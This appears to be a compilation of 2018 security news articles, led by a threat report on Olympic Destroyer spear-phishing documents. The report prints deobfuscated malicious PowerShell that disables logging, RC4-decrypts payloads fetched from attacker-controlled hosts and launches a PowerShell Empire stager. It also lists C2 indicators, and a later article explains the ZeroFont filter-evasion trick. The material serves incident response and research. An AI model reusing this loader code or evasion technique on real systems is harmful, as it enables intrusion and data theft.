We decided to keep tracking the group and set our virtual ‘nets’ to catch Olympic Destroyer again if it showed up with a similar arsenal. To our surprise it has recently resurfaced with new activity.

In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past. This and other TTPs led us to believe that we were looking at the same actor again. However, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed spear-phishing documents, we believe the attackers behind Olympic Destroyer are now targeting financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.

Simplified infection procedure

Infection Analysis
In reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA code, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let incident responders and security researchers recognize such an attack at any time in the future.

One of the recent documents that we discovered had the following properties:

MD5: 0e7b32d23fbd6d62a593c234bafa2311
SHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d
File Type: Microsoft Office Word
Last saved date: 2018-05-14 15:32:17 (GMT)
Known file name: Spiez CONVERGENCE.doc

The embedded macro is heavily obfuscated. It has a randomly-generated variable and function name.

Obfuscated VBA macro

Its purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign.

It starts a new obfuscated Powershell scriptlet via the command line. The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings such as the command and control (C2) server address.

There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.

Obfuscated commandline Powershell scriptlet

This script disables Powershell script logging to avoid leaving traces:

IF(${GPc}[ScriptBlockLogging])
{
${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}
IF(${GPc}[ScriptBlockLogging])
{
${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}
It has an inline implementation of the RC4 routine in Powershell, which is used to decrypt additional payload downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in Powershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.

${k}= ( .VARiabLE Bqvm ).vAlUE::”aSCiI”.GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&(‘%’){
${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.”coUNt”])%256;
${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&(‘%’){
${i}=(${i}+1)%256;
${h}=(${h}+${s}[${I}])%256;
${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}.”LENgtH”];
-JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))
${k}= ( .VARiabLE Bqvm ).vAlUE::“aSCiI”.GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&(‘%’){
${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.“coUNt”])%256;
${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&(‘%’){
${i}=(${i}+1)%256;
${h}=(${h}+${s}[${I}])%256;
${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
${_}–Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}.“LENgtH”];
–JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))
The second stage payload downloaded is an HTA file that also executes a Powershell script.

Downloaded access.log.txt

This file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments. After deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage payload from the same server address. It also uses RC4 with a pre-defined key:

${k}= ( Get-vaRiablE R4Imz -VAl )::”aSCIi”.GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.(‘%’){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.”COUNT”])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.(‘%’){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}.”HeaDErS”.Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}.”LeNGTh”];
-JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
${k}= ( Get–vaRiablE R4Imz –VAl )::“aSCIi”.GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.(‘%’){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.“COUNT”])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.(‘%’){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}–BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}.“HeaDErS”.Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}.“LeNGTh”];
–JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
The final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the downloaded Empire agent.

$wc.HeAders.Add(“User-Agent”,$UA);
$raw = $wc.UploadData($s + “/modules/admin.php”,”POST”,$rc4p2);
Invoke-Expression $($e.GetSTRiNG($(DecrYPT-BYtEs -KeY $kEy -In $raW)));
$AES = $NuLl;

[GC]::COLLEcT();
Invoke-Empire -Servers @(($s -split “/”)[0..2] -join “/”) -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours “WORKING_HOURS_REPLACE” -KillDate “REPLACE_KILLDATE” -ProxySettings $Script:Proxy; }
$wc.HeAders.Add(“User-Agent”,$UA);
$raw = $wc.UploadData($s + “/modules/admin.php”,“POST”,$rc4p2);
Invoke–Expression $($e.GetSTRiNG($(DecrYPT–BYtEs –KeY $kEy –In $raW)));
$AES = $NuLl;

[GC]::COLLEcT();
Invoke–Empire –Servers @(($s –split “/”)[0..2] –join “/”) –StagingKey $SK –SessionKey $key –SessionID $ID –WorkingHours “WORKING_HOURS_REPLACE” –KillDate “REPLACE_KILLDATE” –ProxySettings $Script:Proxy; }
Powershell Empire is a post-exploitation free and open-source framework written in Python and Powershell that allows fileless control of the compromised hosts, has modular architecture and relies on encrypted communication. This framework is widely used by penetration-testing companies in legitimate security tests for lateral movement and information gathering.

Infrastructure
We believe that the attackers used compromised legitimate web servers for hosting and controlling malware. Based on our analysis, the URI path of discovered C2 servers included the following paths:

/components/com_tags/views
/components/com_tags/views/admin
/components/com_tags/controllers
/components/com_finder/helpers
/components/com_finder/views/
/components/com_j2xml/
/components/com_contact/controllers/
These are known directory structures used by a popular open source content management system, Joomla:

Joomla components path on Github

Unfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that one of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software, released in November 2011.

A compromised server using Joomla

Victims and Targets
Based on several target profiles and limited victim reports, we believe that the recent operation by Olympic Destroyer targets Russia, Ukraine and several other European countries. According to our telemetry, several victims are entities from the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner service from European countries such as the Netherlands, Germany and France, as well as from Ukraine and Russia.

Location of targets in recent Olympic Destroyer attacks

Since our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by the content of selected decoy documents, email subjects or even file names picked by the attackers.

One such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat research conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved in the Salisbury attack investigation.

Decoy document using Spiez Convergence topic

Another decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to poison Sergey Skripal and his daughter in Salisbury:

Some other spear-phishing documents include words in the Russian and German language in their names:

9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
One of the documents included a lure image with perfect Russian language in it.

A message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)

One of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file named ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).

Another lure message to encourage the user to enable macro

According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.

Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.

Decoy document inside nakaz.doc

Further analysis of other related files suggest that the target of this document is working in the biological and epizootic threat prevention field.

Attribution
Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).

Similar obfuscated macro structure

The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).

Same MultiPage1_Layout function name used in older campaign

Conclusions
Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.

Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.

More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com

Indicators Of Compromise
File Hashes
9bc365a16c63f25dfddcbe11da042974 Korporativ .doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc
abe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin
b60da65b8d3627a89481efb23d59713a Corporativ_2018.doc
b94bdb63f0703d32c20f4b2e5500dbbe
bb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc
97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc
1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc
0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
0c6ddc3a722b865cc2d1185e27cef9b8
54b06b05b6b92a8f2ff02fdf47baad0e
4247901eca6d87f5f3af7df8249ea825 nakaz.doc

Domains and IPs
79.142.76[.]40:80/news.php
79.142.76[.]40:8989/login/process.php
79.142.76[.]40:8989/admin/get.php
159.148.186[.]116:80/admin/get.php
159.148.186[.]116:80/login/process.php
159.148.186[.]116:80/news.php
ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log
ppgca.ufob.edu[.]br/components/com_finder/views/default.php
narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log
narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php
mysent[.]org/access.log.txt
mysent[.]org/modules/admin.php
5.133.12[.]224:333/admin/get.php


New VirusTotal Service Aims to Reduce False Positives
20.6.2018 securityweek Security

VirusTotal, which recently became part of Alphabet’s new cybersecurity company Chronicle, announced on Tuesday the launch of a new service designed to help software developers and security vendors reduce the number of false positive detections.

VirusTotal Monitor is a premium service that allows software developers to upload their application files to a private cloud store where they are scanned every day by the products of the more than 70 antivirus vendors in VirusTotal.

If a file is flagged as malicious, both the developer and the antivirus vendor are automatically notified.

Developers can upload their files using an interface similar to Google Drive, and both developers and AV companies are provided a dashboard where they can view results. In addition to the web interface, both parties can leverage APIs to integrate Monitor with their own tools.

VirusTotal Monitor

“For antivirus vendors this is a big win, as they can now have context about a file: who is the company behind it? when was it released? in which software suites is it found? What are the main file names with which it is distributed?” explained VirusTotal’s Emiliano Martinez. “For software developers it is an equally big win, as they can upload their creations to Monitor at pre-publish stage, to ensure a release without issues.”

VirusTotal highlighted that the uploaded files will not be shared with third-parties, except for the antivirus vendors, which will get access to the files their products detect.

While it may seem that Monitor opens a door to abuse, VirusTotal pointed out that the new service is “not a free pass to get any file whitelisted.”

“Sometimes vendors will indeed decide to keep detections for certain software, however, by having contextual information about the author behind a given file, they can prioritize work and take better decisions, hopefully leading to a world with less false positives,” Martinez said. “The idea is to have a collection of known source software, then each antivirus can decide what kind of trust-based relationship they have with each software publisher.”

VirusTotal Monitor has been in pre-release testing and is now accepting its first users. Developers can request a trial period.


Phishers Use 'ZeroFont' Technique to Bypass Office 365 Protections
20.6.2018 securityweek
Phishing

Cybercriminals have been leveraging a technique that involves manipulating font sizes in an effort to increase the chances of their phishing emails bypassing the protections implemented by Microsoft in Office 365.

According to cloud security company Avanan, one of the phishing protections in Office 365 involves natural language processing in order to identify text typically used in fraudulent or malicious emails.

For instance, researchers say the system flags emails mentioning “Apple” or “Microsoft” but not coming from legitimate domains, or messages referencing user accounts, password resets or financial requests.

In recent attacks spotted by Avanan, cybercriminals sent out phishing emails in which some of the content is set to be displayed with zero-size font using <span style="FONT-SIZE: 0px">. The security firm has dubbed this technique ZeroFont.

The email looks normal to the user, but Microsoft’s filters read the entire text, even if it’s displayed with a font size of “0”. The user sees this:

ZeroFont phishing email

But Microsoft’s systems will analyze the following text, which includes strings that are invisible to the user due to the "FONT-SIZE: 0px" attribute:

ZeroFont phishing email

“Microsoft can not identify this as a spoofing email because it cannot see the word ‘Microsoft’ in the un-emulated version. Essentially, the ZeroFont attack makes it possible to display one message to the anti-phishing filters and another to the end user,” Avanan’s Yoav Nathaniel said in a blog post.

Last month, Avanan reported that cybercriminals had been splitting malicious URLs in an effort to bypass the Safe Links security feature in Office 365.


CrowdStrike Raises $200 Million at $3 Billion Valuation
20.6.2018 securityweek IT

Sunnyvale, California – based endpoint security firm CrowdStrike today announced that it has secured over $200 million through a Series E round of financing, valuing the company north of $3 billion.

Founded in 2011, CrowdStrike takes a cloud-based approach to endpoint security and has more than doubled both its revenue and headcount over the past year. The company says it is currently serving more than 16% of Fortune 1000 companies and 20% of Fortune 500 companies.

According to the company, the newly secured funds will be used to accelerate the global demand for its CrowdStrike Falcon endpoint protection platform.

The company also says it has seen impressive year-over-year growth in various areas, including: 500% increase in number of $1 million or greater annual contract value (ACV) transactions, 167% increase in the number of subscription customers, 172% growth in new subscription bookings ACV, and 140% increase in annual recurring revenue.

In early June, the company launched its next-generation endpoint security breach prevention warranty, offering up to $1 million if a breach occurs within a customer’s protected environment, as part of its Falcon EPP Complete offering.

In July 2017, CrowdStrike teamed with Dragos, a company that specializes in protecting industrial control systems (ICS), on a strategic partnership to allow joint customers to benefit from a combination of CrowdStrike’s assessment, preparedness and incident response services and Dragos’ expertise in protecting ICS.

The Series E funding round was led by General Atlantic, Accel and IVP, with participation from March Capital and CapitalG.


Cylance Announces $120 Million in Funding
20.6.2018 securityweek IT

Endpoint security firm Cylance announced Tuesday afternoon that it has closed a $120 million funding round led by funds managed by Blackstone Tactical Opportunities and including other investors.

The announcement was made hours after endpoint security rival CrowdStrike announced that it had raised more than $200 million in a Series E round of funding at a $3 billion valuation. Given the timing of the announcement—just after 1PM ET—it is likely that Cylance had been preparing to announce its funding in the near future, but scrambled to get the news out as soon as possible to follow CrowdStrike. The company did not immediately respond to a request for comment on the timing of the announcement.

Cylance’s flagship endpoint security product, CylancePROTECT, takes a mathematical and machine learning approach to identifying and containing zero day and advanced attacks. The company has been utilizing artificial intelligence and machine learning as part of its core marketing message since the company was founded in 2012.

The company claims that it has prevented over 23 million attacks worldwide, including more than four million previously unidentified attacks.

According to Cylance, the additional cash will be used to support sales, marketing and development efforts to increase market share, and further expand its footprint across Europe, the Middle East, and Asia Pacific, and expand product offerings.

“With annual revenues over $130 million for fiscal year 2018, over 90% year-over-year growth, and more than 4,000 customers, including over 20% of the Fortune 500, we have demonstrated market success, scale and traction,” said Brian Robins, Chief Financial Officer at Cylance. “We are honored to have Blackstone Tactical Opportunities expand its commitment to Cylance by leading this round of financing. The investment supports our growth strategy and will enable us to continue on the path to becoming cash flow positive.”

In April 2017, Ars Technica published an article detailing a test that used 48 Cylance-provided malware samples, which showed 100% detection by Cylance, but somewhat less from competing products, leading some to some suggestions that Cylance had been gaming the system. In response, Chad Skipper, Cylance's vice president of product testing and industry relations, explained that Cylance doesn't simply use known malware for tests, but alters them via the mpress and vmprotect packers so they effectively become unknown malware. Cylance also claimed at the time, that the majority of independent third-party tests are biased in favor of the incumbent vendors that use malware signature databases (as well as other techniques, including their own use of machine learning).

Cylance is not alone in disputes over competitive testing methods. CrowdStrike sued testing firm NSS Labs in 2017 to seek a temporary restraining order to prevent publication of CrowdStrike comparative test results. CrowdStrike explained that it filed suit to hold NSS accountable for unlawfully accessing its software, breaching its contract, pirating its software, and improper security testing.


China-Linked 'Thrip' Spies Target Satellite, Defense Companies
20.6.2018 securityweek BigBrothers

A China-linked cyber espionage group has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia, Symantec reported on Tuesday.

Symantec has been tracking the threat actor, which it has named “Thrip,” since 2013. However, the security firm says the group’s activities have not been made public until now.

Thrip has used a combination of custom malware and legitimate tools in its attacks. One victim was a satellite communications operator, where the hackers targeted devices involved in operations, as well as systems running software designed for monitoring and controlling satellites.

“This suggests to us that Thrip’s motives go beyond spying and may also include disruption,” Symantec researchers said.

Thrip has also targeted a company specializing in geospatial imaging and mapping. The attackers attempted to gain access to machines hosting MapXtreme GIS, Google Earth Server and Garmin imaging software.

The list of victims identified by Symantec also includes three telecoms firms in Southeast Asia. The companies themselves appear to have been Thrip’s targets rather than their customers. Another victim is a defense contractor, but no details have been shared by the security firm on this attack.

Symantec has been monitoring Thrip since 2013, when it spotted a campaign conducted from systems located in China. The group initially relied mostly on custom malware, but more recent campaigns, which started last year, also involved legitimate tools.

The pieces of malware used by the group include Trojan.Rikamanu, a trojan designed for stealing credentials and other information from compromised systems, and Infostealer.Catchamas, an evolution of Rikamanu that includes improved data theft and anti-detection capabilities.

Thrip has also been spotted using Trojan.Mycicil, a keylogger offered on Chinese underground marketplaces but which has not been seen often, and Backdoor.Spedear and Trojan.Syndicasec, both of which have been observed in the group’s older campaigns.

As for the legitimate tools used by the cyberspies, the list includes the Windows SysInternals utility PSExec, PowerShell, the post-exploitation tool Mimikatz, the open source FTP client WinSCP, and the LogMeIn remote access software.

“This is likely espionage,” said Greg Clark, CEO of Symantec. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organizations won’t notice their presence. They operate very quietly, blending in to networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defense companies. We stand ready to work with appropriate authorities to address this serious threat.”


Does Cryptocurrency Encourage Crime?
20.6.2018 securityaffairs Cryptocurrency

Is cryptocurrency making some wrongdoings harder to commit while making others more rampant in society? Does Cryptocurrency Encourage Crime?
People hear a lot about how cryptocurrency — and particularly the blockchain technology associated with it — could decrease some kinds of crime because it’s so transparent and all transactions become part of an unchangeable record.

However, is cryptocurrency making some wrongdoings harder to commit while making others more rampant in society?

Cybersecurity Firm Says Cryptocurrency Causes Raised Ransom Demands
A cybersecurity firm in the United Kingdom called MWR InfoSecurity believes the increasing demand in the cryptocurrency market contributes to more depth and liquidity. So, people who buy and sell cryptocurrency assets can more easily move enormous amounts of the virtual currency without causing dramatic price fluctuations in those assets.

Representatives of MWR InfoSecurity argue that those conditions make cybercriminals feel emboldened when making larger than usual ransom requests from their victims. They often request cryptocurrency instead of traditional money, and it’s becoming easier for them to up the amounts they demand.

Although cryptocurrency doesn’t necessarily facilitate crimes in these cases, it could urge the criminals to be more devastating to their targets.

Cryptocurrency Connected to Crime Increase in India
The Indian government does not recognize cryptocurrency as legal tender, and it banned banks from providing services to companies that buy and sell virtual currency. That latter decision caused some cryptocurrency exchanges to shut down.

India is not a welcoming country for cryptocurrency users, and that’s likely because when cryptocurrency began taking off in the country, related crimes rose too.

Some of them focused on duping hopeful investors who wanted to get rich with cryptocurrency. Others include crimes connected to malware on cryptocurrency mining machines. Fake cryptocurrency apps and unscrupulous companies appeared as well.

In the majority of cases, criminals likely noticed opportunities because people got excited about a technology about which they knew little.

The perpetrators cashed in on ignorance and often succeeded because their victims were so eager to get involved in cryptocurrency that they took leaps without first getting sufficiently educated.

Criminals commonly prey on people who are desperate, and that’s why the cryptocurrency market is ripe for their misdeeds.

Many individuals view the cryptocurrency market as one filled with promise. Moreover, they read the stories of people who are now millionaires after becoming early cryptocurrency investors. So, some people are more likely than not to get ahead of themselves and become involved in cryptocurrency scams due to not performing adequate research.

Most Online Crimes Involve Cryptocurrency — but Not Always Anonymity
According to some estimates, as much as 99 percent of unlawful online activities have an element of cryptocurrency. Plus, although people on the blockchain can see cryptocurrencies going into various wallets, criminals know it’s not likely law enforcement agencies will link their identities to the wallets.

That lack of identifying information allows them to sell content snatched during data breaches and feel less afraid that they’ll get found out compared to if they were trying to profit from their crimes without the cloak of cryptocurrency.

Further statistics from a recent research paper found that approximately 25 percent of all Bitcoin users have ties to illegal activities and that 44 percent of Bitcoin transactions were connected to crimes.

Regardless of that data, it is foolish for criminals to assume they need not be worried about getting found out if they deal in cryptocurrency crimes. Instances exist of investigators being able to track the IP addresses of cryptocurrency criminals due to those individuals’ carelessness.

Also, a research team discovered there were cases where it was possible to link cryptocurrency transactions with single IP addresses. Through their work, they connected more than 1,000 IP addresses and Bitcoin accounts.

Law Enforcement Agencies Meet the Challenge
The increase in cryptocurrency crime has made police forces around the world realize they cannot afford to let the criminals within the industry remain unchecked. In Europe, an annual conference brings law enforcement personnel and cryptocurrency experts together for a meeting of the minds.

The 2017 gathering attracted over 150 people from around the world. The topics covered included the illegal uses of cryptocurrency, plus legitimate ways to rely on cryptocurrency to reduce crime.

Crime investigators are also using special software that screens cryptocurrency transactions for potential links to things like the black market, theft or drugs. Organizations ranging from the Internal Revenue Service (IRS) to the Drug Enforcement Administration (DEA) are reportedly among the software manufacturers’ clients

Cryptocurrency

Spurring the Evolution of Crime-Solving Techniques
There’s no doubt about the connection between increases in crime and cryptocurrency. The virtual currency makes criminals attempt new offenses facilitated by aspects of the industry at large, such as cryptocurrency mining. The lack of understanding some consumers have about cryptocurrencies only makes them easier targets.

At the same time, law enforcement agencies are stepping up and developing new methods to get to the bottom of crimes and those who commit them.

So, means of fighting crime get updated, and criminals find out their deeds may not stay hidden forever.


Ex-CIA employee Joshua Adam Schulte charged with leaking Vault 7 dumps
20.6.2018 securityaffairs Hacking

An Ex-CIA employee, Joshua Adam Schulte (29), has been charged with stealing classified national defense information and sharing Vault 7 dumps with WikiLeaks.
Yesterday, the Department of Justice announced that Schulte has been charged with 13 count indictment.

In middle May, both The New York Times and The Washington Post, revealed the name of the alleged source of the Vault 7 leak, the man who passed the secret documents to Wikileaks. According to his LinkedIn profile, Schulte worked for the NSA for five months in 2010 as a systems engineer, after this experience, he joined the CIA as a software engineer and he left the CIA in November 2016.

Schulte was identified a few days after WikiLeaks started leaking the precious dumps.

Schulte was arrested for possession of child pornography, he was charged on three counts of receipt, possession and transportation of child pornography in August 2017.

The man was released in September 2017, but in December he was arrested again for violating the conditions of his release.

“SCHULTE, 29, of New York, New York, is charged with one count each of (i) illegal gathering of national defense information, (ii) illegal transmission of lawfully possessed national defense information, (iii) illegal transmission of unlawfully possessed national defense information, (iv) unauthorized access to a computer to obtain classified information, (v) theft of Government property, (vi) unauthorized access of a computer to obtain information from a Department or Agency of the United States, (vii) causing transmission of a harmful computer program, information, code, or command, (viii) making material false statements to representatives of the FBI, (ix) obstruction of justice, (x) receipt of child pornography, (xi) possession of child pornography, (xii) transportation of child pornography, and (xiii) copyright infringement. ” reads the press release published by the DoJ.

According to the DoJ, Schulte used his access to CIA’s networks while working for the intelligence agency.

“Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Vault 7 dumps

Schulte always denied the accusations for being involved in Vault 7 data leak, he believes that the authorities suspected him due to the fact that he had left the CIA a few months before the beginning of the data leak.


'Olympic Destroyer' Malware Spotted in New Attacks
19.6.2018 securityweek
Virus

Olympic Destroyer, the malware involved in a campaign targeting this year’s Olympic Winter Games in Pyeongchang, South Korea, has been used recently in attacks aimed at organizations in Germany, France, the Netherlands, Russia, Switzerland and Ukraine.

Olympic Destroyer is designed to wipe files and make systems inoperable, and steal passwords from browsers and Windows. The malware was used during the Olympics in an attack that disrupted IT systems, including the official event website, display monitors, and Wi-Fi connections.

Researchers noted after the attack that the hackers behind the operation planted sophisticated false flags inside Olympic Destroyer. Various clues suggested that the campaign could have been the work of North Korea, Russia or China.

Kaspersky Lab spotted new attacks involving Olympic Destroyer in May and June, and the list of targets raises even more questions about the threat actor’s goals and motives.

The latest attacks targeted financial companies in Russia and European organizations focusing on protection against chemical and biological threats, including in Germany, France, the Netherlands, Switzerland and Ukraine.

The malware was delivered using spear-phishing emails carrying malicious documents. Many of the decoy documents referenced bio-chemical threat research, and some of the text was written in perfect Russian, which suggests that a native speaker helped write it.

The attack also involved PowerShell scripts and Powershell Empire, an open-source framework that allows fileless control of the compromised machine. The malware was hosted and controlled using hacked web servers running vulnerable versions of the Joomla content management system.

The fact that financial organizations were also targeted could mean one of several things. It’s possible that the Olympic Destroyer malware is used by multiple threat groups, including one that is financially motivated. It could also be a result of cyberattack outsourcing, which researchers claim is not uncommon for nation state actors, or the financial-focused attacks could be part of another false flag operation. In any case, the new attacks involving Olympic Destroyer are significant.

“It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits,” Kaspersky researchers warned.


Ex-CIA Employee Charged With Leaking Agency's Hacking Tools
19.6.2018 securityweek BigBrothers

A former employee of the U.S. Central Intelligence Agency (CIA) has been charged with stealing classified national defense information from the agency and sharing it with WikiLeaks.

The Department of Justice announced on Monday that Joshua Adam Schulte, 29, of New York, New York, had been charged in a 13-count indictment. The indictment does not specifically name WikiLeaks, but the media revealed last month that authorities had been preparing to charge Schulte for providing WikiLeaks the CIA hacking tools that were published by the whistleblower organization as part of its Vault 7 leak.

Schulte worked for the NSA for five months in 2010 as a systems engineer. He then joined the CIA, where he worked as a software engineer until November 2016, when he moved to New York City and started working as a software engineer for Bloomberg.

The man reportedly became the main suspect for the Vault 7 leaks one week after WikiLeaks started releasing files. However, when investigators searched his apartment and devices, they uncovered a file sharing server hosting child pornography.

Schulte was charged on three counts of receipt, possession and transportation of child pornography in August 2017 and was released the following month. He was arrested again in December for violating the conditions of his release and he has been in custody ever since.

